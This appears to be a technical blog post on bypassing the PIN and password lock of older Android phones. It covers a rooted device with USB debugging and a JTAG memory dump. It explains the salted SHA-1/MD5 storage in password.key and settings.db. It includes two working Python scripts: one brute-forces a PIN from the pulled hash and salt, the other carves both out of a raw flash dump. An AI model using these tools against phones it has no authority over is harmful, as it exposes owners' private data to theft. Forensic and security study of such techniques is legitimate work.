As you may know, it is possible to get around the PIN and password lock on an Android smartphone. In this post we describe the following two ways of doing so:
- on a rooted smartphone
- with the help of the JTAG interface
Some Background Information
Since version 2.2 Android provides the option of a numeric PIN or an alphanumeric password as an alternative to the pattern lock. Both are required to be between 4 and 16 digits or characters in length.
Android stores this credential in a special file called password.key in /data/system/. As storing it in plain text would not be very safe, this time Android stores a salted SHA-1 hash and a salted MD5 hash of the PIN or password, written one after the other as hexadecimal text. The numeric PIN and the alphanumeric password are processed in the same way (see the following code snippet).
```java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import android.util.Log;

// Excerpt from Android's com.android.internal.widget.LockPatternUtils.
// getSalt(), toHex() and TAG are members of that class and are not shown here:
// getSalt() returns the salt as a hex string, toHex() renders bytes as uppercase hex.
public byte[] passwordToHash(String password) {
    if (password == null) {
        return null;
    }
    String algo = null;
    byte[] hashed = null;
    try {
        // The salt is appended to the password before hashing
        byte[] saltedPassword = (password + getSalt()).getBytes();
        byte[] sha1 = MessageDigest.getInstance(algo = "SHA-1").digest(saltedPassword);
        byte[] md5 = MessageDigest.getInstance(algo = "MD5").digest(saltedPassword);
        // Stored form: 40 hex characters of SHA-1 followed by 32 hex characters of MD5
        hashed = (toHex(sha1) + toHex(md5)).getBytes();
    } catch (NoSuchAlgorithmException e) {
        Log.w(TAG, "Failed to encode string because of missing algorithm: " + algo);
    }
    return hashed;
}
```
Because the hash is salted this time, precomputed dictionaries and rainbow tables are useless: you first need the salt, and then enough time for a brute force attack on the password (trivial for a 4-digit PIN, far less so for a long alphanumeric password). The salt is the hexadecimal representation of a random 64-bit integer, at most 16 hex digits, which is appended to the password before hashing. To get this salt, there are two ways from which you can choose.
On a Rooted Smartphone:
If you deal with a rooted smartphone and USB debugging is enabled, cracking the PIN/password lock is quite simple. You just have to dump the file /data/system/password.key and the salt, which is stored in a SQLite database under the key lockscreen.password_salt. The corresponding database can be found in /data/data/com.android.providers.settings/databases and is called settings.db; the lock screen settings are name/value rows in its secure table (see the figure below). Both files are only readable as root. Once you have both pieces of information you just need to start brute forcing the password.
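As an added example (not code from the original post), the following Python script reproduces passwordToHash() on the attacker's side and brute-forces a numeric PIN from a pulled password.key and settings.db. It assumes both files were copied off the rooted phone (for instance with adb); here the settings database is built in memory and the password.key content is derived from a constructed PIN and salt, so it runs offline. One detail the page's snippet only hints at: settings.db holds the salt as a decimal signed 64-bit integer, while LockPatternUtils.getSalt() (called but not shown above) returns Long.toHexString() of that value, so the decimal string has to be converted to lowercase two's-complement hex before it is appended to the password.

```python
import hashlib
import itertools
import sqlite3
import string

HEX_UPPER = set("0123456789ABCDEF")


def salt_to_hex(salt_value: str) -> str:
    """settings.db stores the salt as a decimal signed 64-bit integer (it may be negative).
    getSalt() returns Long.toHexString(salt): lowercase two's-complement hex without
    leading zeros, and that string is what gets appended to the password."""
    return format(int(salt_value) & 0xFFFFFFFFFFFFFFFF, "x")


def android_password_hash(password: str, salt_hex: str) -> str:
    """Same construction as passwordToHash(): hex(SHA-1(pw+salt)) + hex(MD5(pw+salt)),
    uppercase, 40 + 32 = 72 characters."""
    salted = (password + salt_hex).encode("utf-8")
    return hashlib.sha1(salted).hexdigest().upper() + hashlib.md5(salted).hexdigest().upper()


def parse_password_key(raw: bytes) -> str:
    """Validate the content of a pulled /data/system/password.key."""
    text = raw.decode("ascii").strip()
    if len(text) != 72 or not set(text) <= HEX_UPPER:
        raise ValueError("expected 72 uppercase hex digits (SHA-1 followed by MD5)")
    return text


def read_salt(con: sqlite3.Connection) -> str:
    """Lock screen settings are name/value rows in the 'secure' table of settings.db."""
    row = con.execute(
        "SELECT value FROM secure WHERE name = 'lockscreen.password_salt'"
    ).fetchone()
    if row is None:
        raise LookupError("no lockscreen.password_salt row; no PIN/password was ever set")
    return row[0]


def brute_force(target: str, salt_hex: str, alphabet: str = string.digits,
                min_len: int = 4, max_len: int = 16):
    """Try every candidate of the allowed lengths. Only the SHA-1 half is computed per
    candidate; the MD5 half confirms a hit. Returns the password or None."""
    target_sha1, target_md5 = target[:40], target[40:]
    salt = salt_hex.encode("utf-8")
    for length in range(min_len, max_len + 1):
        for cand in itertools.product(alphabet, repeat=length):
            pw = "".join(cand).encode("utf-8")
            if hashlib.sha1(pw + salt).hexdigest().upper() == target_sha1:
                if hashlib.md5(pw + salt).hexdigest().upper() == target_md5:
                    return pw.decode("utf-8")
    return None


def make_sample_settings_db(salt_value: str) -> sqlite3.Connection:
    """Constructed stand-in for a pulled settings.db (same table layout as the real one)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE secure (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                "name TEXT UNIQUE ON CONFLICT REPLACE, value TEXT)")
    con.execute("INSERT INTO secure (name, value) VALUES (?, ?)",
                ("lockscreen.password_salt", salt_value))
    return con


def demo(pin: str = "2580", salt_value: str = "-3748212405389423152") -> str:
    """End-to-end run on constructed data: the PIN and salt stand in for what a real phone
    stored, and the password.key content is derived from them."""
    con = make_sample_settings_db(salt_value)
    salt_hex = salt_to_hex(read_salt(con))
    password_key = (android_password_hash(pin, salt_hex) + "\n").encode("ascii")
    target = parse_password_key(password_key)
    return brute_force(target, salt_hex, max_len=len(pin))


if __name__ == "__main__":
    print("recovered PIN:", demo())
```

Pure Python is fine for 4 to 6 digit PINs; for long alphanumeric passwords the same salt and 72-character hash go into a GPU cracker instead, the construction being plain SHA-1 over password plus hex salt.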
With the Help of the JTAG Interface:
If you deal with a stock, or at least unrooted, smartphone the whole process is a bit more complicated. First of all, you need special hardware such as a Riff-Box with a JIG adapter, or some soldering skills, to reach the JTAG interface. Once you have a physical dump of the complete memory chip, the hunt for the password hash can start. To find the hashes of the passphrase you need to keep the following points in mind:
- The memory dump is organised in chunks of 2048 bytes (the flash page size)
- The password.key file contains two hashes, written as hex text and together 72 bytes long:
- a SHA-1 hash (20 bytes, stored as 40 hex characters)
- an MD5 hash (16 bytes, stored as 32 hex characters)
- Because they are stored as hex text, these 72 bytes only contain the characters 0-9 and A-F
- The following 1960 bytes of the chunk are zeros
- The remaining 16 bytes of the chunk are random
The points above let us find the hashes. The salt sits in a record of the settings database, and the layout of a SQLite record (header with one serial type per column, then the column values) gives us a second ruleset to find the position of the salt as well as the actual salt (refer to the figure below for a better understanding):
- Search for the string "lockscreen.password_salt".
- The byte directly in front of it has to be between 0x0F and 0x35. This byte is the SQLite serial type of the value column, which encodes the length of the salt, and is called byteA in the rest of this article.
- In front of this byte there has to be a byte 0x3D. This is the serial type of a string with a length of 24 (2 * 24 + 13 = 0x3D), i.e. the length of the name we searched for.
- In front of this byte there has to be a zero byte. It is the serial type NULL of the _id column, which SQLite keeps as the rowid rather than inside the record.
- Decoding byteA as (byteA - 13) / 2 gives the length of the salt, which has to be between 1 and 20 bytes (the decimal representation of a signed 64-bit integer, including a possible minus sign).
- Now extract this number of bytes directly after the string "lockscreen.password_salt".
- These bytes are the salt!
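As an added example (not code from the original post), the two rulesets above written as a carver over a raw dump. The dump used here is constructed: page 0 mimics the password.key chunk, page 1 holds a record of the settings secure table; offsets and the salt value are therefore the example's own. The carver reports every match rather than the first one, because a physical flash dump usually also contains stale copies of the settings page (old salts from before a PIN change, or free pages) and the right one has to be tried against the hash.

```python
import re

CHUNK = 2048                                # flash page size the dump is split into
HASH_LEN = 72                               # 40 hex chars SHA-1 + 32 hex chars MD5
KEY_NAME = b"lockscreen.password_salt"
NAME_SERIAL_TYPE = 2 * len(KEY_NAME) + 13   # 0x3D: SQLite serial type of a 24-char TEXT
NULL_SERIAL_TYPE = 0x00                     # _id is the rowid and is stored as NULL


def find_password_hashes(dump: bytes):
    """Ruleset 1: a chunk that starts with 72 uppercase hex characters followed by 1960
    zero bytes is a copy of password.key. Returns [(offset, sha1_hex, md5_hex), ...]."""
    hits = []
    for off in range(0, len(dump) - CHUNK + 1, CHUNK):
        chunk = dump[off:off + CHUNK]
        head = chunk[:HASH_LEN]
        if re.fullmatch(rb"[0-9A-F]{72}", head) and not any(chunk[HASH_LEN:CHUNK - 16]):
            hits.append((off, head[:40].decode("ascii"), head[40:].decode("ascii")))
    return hits


def find_salts(dump: bytes):
    """Ruleset 2: locate records of the settings 'secure' table whose name column is
    lockscreen.password_salt. Record header = [hdr_len][0x00 _id][0x3D name][byteA value],
    record body = name text + value text, so the salt follows the name directly.
    Returns [(offset_of_name, salt_decimal_string), ...]."""
    hits = []
    pos = dump.find(KEY_NAME)
    while pos >= 0:
        if pos >= 3:
            byte_a, t_name, t_id = dump[pos - 1], dump[pos - 2], dump[pos - 3]
            # TEXT serial types are odd (2*N + 13); 0x0F..0x35 covers N = 1..20, the
            # longest decimal form of a signed 64-bit integer. Even values would be BLOBs.
            if (0x0F <= byte_a <= 0x35 and byte_a % 2 == 1
                    and t_name == NAME_SERIAL_TYPE and t_id == NULL_SERIAL_TYPE):
                salt_len = (byte_a - 13) // 2
                start = pos + len(KEY_NAME)
                salt = dump[start:start + salt_len]
                if re.fullmatch(rb"-?[0-9]+", salt):
                    hits.append((pos, salt.decode("ascii")))
        pos = dump.find(KEY_NAME, pos + 1)
    return hits


def salt_to_hex(salt_value: str) -> str:
    """The database value is decimal; the hash uses Long.toHexString() of it."""
    return format(int(salt_value) & 0xFFFFFFFFFFFFFFFF, "x")


def build_sample_dump() -> bytes:
    """Constructed two-page dump: page 0 mimics password.key, page 1 holds a settings record."""
    sha1_hex = "0123456789ABCDEF" * 2 + "01234567"          # 40 hex chars (made up)
    md5_hex = "FEDCBA9876543210" * 2                         # 32 hex chars (made up)
    page0 = (sha1_hex + md5_hex).encode("ascii") + b"\x00" * 1960 + b"\x5a" * 16
    salt = b"-3748212405389423152"                           # 20 chars: byteA = 0x35
    record = bytes([4, NULL_SERIAL_TYPE, NAME_SERIAL_TYPE, 2 * len(salt) + 13]) + KEY_NAME + salt
    page1 = b"\xaa" * 100 + record
    page1 += b"\xaa" * (CHUNK - len(page1))
    return page0 + page1


if __name__ == "__main__":
    dump = build_sample_dump()
    for off, sha1_hex, md5_hex in find_password_hashes(dump):
        print("password.key at", off, sha1_hex, md5_hex)
    for off, salt in find_salts(dump):
        print("salt record at", off, "salt", salt, "-> hashed as", salt_to_hex(salt))
```

The zero-byte and byteA checks are what keep the name's copies in the table's unique index out of the result: an index entry carries the name and a rowid but no value column, so the byte in front of the string there is a small integer serial type, not one in the 0x0F to 0x35 range.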